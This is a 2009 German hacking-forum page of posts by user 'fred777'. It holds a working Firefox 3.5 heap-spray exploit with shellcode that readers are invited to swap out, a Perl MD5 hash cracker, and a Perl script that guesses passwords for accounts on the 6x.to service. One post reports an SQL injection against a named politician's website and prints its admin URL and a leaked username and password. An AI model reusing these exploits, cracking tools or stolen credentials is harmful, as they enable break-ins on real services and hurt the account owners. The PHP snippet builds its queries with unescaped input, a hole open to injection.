Beiträge von fred777

fred777 · 22. Juli 2009

Bin noch auf FH, Back2Hack, darkc0de, Creative-Coding aktiv

fred777 · 20. Juli 2009

Hier auch noch einige mit denen ich damals ganz gute Erfahrungen gemacht habe, (heute natÃ¼rlich auch nicht :))
Kannst gerne einfÃ¼gen bei dir
[hide]
http://tutorial.schornboeck.net/inhalt.htm
http://www.cplusplus.com/doc/tutorial/
http://www.c-plusplus.de/cms/m…x&req=viewsdownload&sid=2
http://www.mathematik.uni-marburg.de/~cpp/
http://ladedu.com/cpp/
http://www.intap.net/~drw/cpp/
http://www.java2s.com/Tutorial/Cpp/CatalogCpp.htm[/hide]

fred777 · 19. Juli 2009

Ich fÃ¼hr das von //ins0.! mal weiter, wiegesagt, wenn du die Werte hast und in Variablen gespeichert, kannst du mit INSERT INTO die Werte in die DB schreiben:

PHP

<?php
$host="loaclhost";
$user="schattenbaum";
$pass="schattenbaump0rn";
$db="schattendb";
mysql_connect($host,$user,$pass);
mysql_select_db($db);
//$hits werden deklariert
//$name werden deklariert...blahh
//$description wird deklariert blah
$insert="INSERT INTO info (`hits`, `name`, `description`) VALUES ('".$hits."','".$name."', '".$description."')";
$result=mysql_query($insert);
$output = mysql_fetch_array($result);
print " Hits: $output[0] Name: $output[1] Description: $output[2]";
?>

Alles anzeigen

Ich hoffe das hilft dir ebenfalls weiter..

fred777 · 17. Juli 2009

Es kann aber auch ein falscher Charset sein, versuch es mal mit:
unhex(hex(foobar))

fred777 · 16. Juli 2009

Ich sage es mal so, der Humor ist manchmal schon abartig, trotzdem mir gefÃ¤llts auf meine Art

fred777 · 16. Juli 2009

Noch neu, allerdings bei den Tests nicht immer funktionsfÃ¤hig, so auch bei mir, trotzdem netter Fund, vielleicht funktioniert es ja bei euch, Shellcode kÃ¶nnt ihr ja selbst einfÃ¼gen, bzw anpassen...

HTML

<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
Author: SBerry aka Simon Berry-Byrne
Thanks to HD Moore for the insight and Metasploit for the payload
<div id=content">
Loremipsumdoloregkuw
Loremipsumdoloregkuwiert
Loremikdkw
</div>
<script language=JavaScript>
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
/* Heap Spray Code */
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
function escapeData(data)
{
var i;
var c;
var escData='';
for(i=0;i<data.length;i++)
{
c=data.charAt(i);
if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
escData+=c;
}
return escData;
}
function DataTranslator(){
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["str] = "blah";
var newElement = document.getElementById("content")
if (document.getElementsByTagName) {
var i=0;
pTags = newElement.getElementsByTagName("p")
if (pTags.length > 0)
while (i<pTags.length)
{
oTags = pTags[i].getElementsByTagName("font")
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}
function GenerateHTML()
{
var html = "";
for (i=1;i<searchArray.length;i++)
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>

Alles anzeigen

fred777 · 16. Juli 2009

Noch viel Spass sonst noch bei deinen Projects
Und wenn du mal Hilfe brauchst, ICQ -> me

fred777 · 15. Juli 2009

Hi Dude, Wissen Ã¼ber das PE Format kann nie schaden, schau dir einfach mal den Aufbau an und als Anfang ist ein Crypter oder Packer nicht schlecht, zumal es auch viele Sources gibt
http://win32assembly.online.fr/pe-tut1.html

fred777 · 15. Juli 2009

Hoffe ich auch, willkommen hier und HF

fred777 · 15. Juli 2009

Naja, ist gestern entstanden, er knackt MD5 Hashs per Bruteforce oder Wordlist..
Was noch hinzukommen wird ist:
+ Listenimportierung
+ Suche in Online-Datenbanken

Funktioniert auch wunderbar bis jetzt

Code:
[hide]

Code

#!usr/bin/perl
#Use moduls and variables
use Digest::MD5 qw(md5_hex);
my ($word,@words,$line,$res,$leng,$charset,$hash,$mincount,$maxcount,$ret,$cnt,$choise,$lim,$i,@Raws);
#It looks cool :>
system("cls");
print q {
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ MD5 Hash Cracker
~
~ + cracking with wordlists
~ + cracking with bruteforce
~
~ + use charset aAdx for bruting
~ + coded by fred777 and thx to iman
~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
};
#Select your first choise, the method
print "Use wordlists or bruteforce [W or B]: ";
chomp($res =<STDIN>);
##########################################################
# The wordlist modul
##########################################################
if ($res eq "W" | $res eq "w")
{
print "\n\nPlease insert MD5 Hash: ";
chomp($hash = <STDIN>);
$leng = length($hash);
if($leng!=32)
{
print "\nIts not a valid md5 hash..\n\n";
exit;
system("Pause");
}
print "Please insert path: ";
chomp(my $path = <STDIN>);
# search hash in a foreach loop
open(WORD, "$path") || die "\nError, its a bad path\n";
foreach(<WORD>)
{
chomp;
$line = md5_hex($_);
if($line =~ $hash)
{
print "\n\nCracked word: $_ \n\n";
}
}
}
##########################################################
# The bruteforce modul
##########################################################
if ($res eq "B" | $res eq "b")
{
print "\nPlease insert hash: ";
chomp($hash=<STDIN>);
if (length($hash) != 32)
{
print "\nIts not a valid md5 hash..\n\n";
exit;
system("Pause");
}
# Choose counts and charsets
print "Charset eingeben: ";
chomp($charset=<STDIN>);
print "mincount: ";
chomp($mincount=<STDIN>);
print "maxcount: ";
chomp($maxcount=<STDIN>);
if ($charset=~"a") {
$choise = "abcdefghijklmnopqrstuvwxyz";}
if ($charset=~"A") {
$choise = $choise. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($charset=~"d") {
$choise = $choise."1234567890";}
if ($charset=~"x") {
$choise = $choise. "!Â§\"\$%&/()=?`*+~'#-_|<>Â°^Â´\}][{ .:,;";}
for (my $tim=$mincount;$tim<=$maxcount;$tim++){
crack ($tim);
}
# The cracking CORE
sub crack{
$lim = shift;
@Raws = ();
for ($i =0;$i<$lim;$i++){ $Raws[i] = 0;}
do{
for ($i =0;$i<$lim;$i++)
{
if ($Raws[$i] > length($choise)-1)
{
if ($i==$lim-1)
{
print "\nNo Results, please change your settings..\n";
$cnt=0;
return false;
}
$Raws[$i+1]++;
$Raws[$i]=0;
}
}
$ret = "";
for (my $i =0;$i<$lim;$i++){ $ret = $ret . substr($choise,$Raws[$i],1);}
$word = md5_hex($ret);
$cnt++;
print " -$word $ret\n";
if ($hash eq $word)
{
die "\ncracked word: $ret\n";
}
$Raws[0]++;
}
while($Raws[$lim-1]<length($choise));
}
}
print "\n\n";
system("Pause");

Alles anzeigen

[/hide]

fred777 · 15. Juli 2009

Nein, als ich es getestet habe (vor 1 Monat) nicht

fred777 · 15. Juli 2009

Ich stell das mal hier rein, damit nicht jeder dieses Zeug brutet..
Wenn ich Zeit habe erweitere ich es noch fÃ¼r alle bekannteren Redirection Services :>

Code:
[hide]

Perl

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
print "#################################\n";
print "# 6x.to Wordlist Cracker #\n";
print "# fred777 and thx to h0yt3r #\n";
print "# Usage [PATH] [USERNAME] #\n";
print "#################################\n";
system("Pause");
my $ua = LWP::UserAgent->new();
my $path = shift or die("Usage $0 [Path] [Username]\n");
my $user = shift or die("Pls specifly a Username\n");
open (LIST,'<',$path) or die "File doesnt exist\n";
foreach my $password (<LIST>) {
$password =~ s/\n//;
my $resp = $ua->get ("http://www.6x.to/edit.php?user=$user&domain=6x.to&pass=$password&action=login");
die("Request failed\n")
unless ($resp->is_success);
if ($resp->content =~ /Controlpanel for/) {
print "$user.6x.to cracked\n";
print "password is: $password\n";
last;
} else {
print $password."\n";
}
}
system("Pause");

Alles anzeigen

[/hide]

fred777 · 15. Juli 2009

WB Steve

fred777 · 15. Juli 2009

kenne dich so halb jop, Willkommen hier und HF
Wie Syler allerdings schon sagte, was kannst du so?

fred777 · 14. Juli 2009

Ist sowieso Version 4:
http://www.martin-schulz.info/…3,4,5,6,7,8,9,10,11,12,13
Nebenbei, PRoxyseiten sortieren schon manchmal, doch stimmen tun diese Ergebnisse selten, lieber selbst checken

Edit:
Done:
http://www.martin-schulz.info/admin/
http://www.martin-schulz.info/…12,13+from+user+limit+1,1

mariomommertz:apfelkuchen
etc..

Beiträge von fred777

Wo seit ihr noch unterwegs?

C++ faq

Seiten Inhalte auslesen

Mixing of GROUP columns (MIN(),MAX().... Fehler?

BrÃ¼no - Geht's noch?

Remote Buffer Overflow "Firefox 3.5"

Paran0id tritt in den Hintergrund

[C] Was soll ich machen?

fr0zen f0g sagt hallo

[Perl] MD5 Cracker by fred

6x.to Wordlist Cracker

6x.to Wordlist Cracker

Steve wieder dabei!

Nabend

[SQL-INJ] Martin Schulz EU Abgeordneter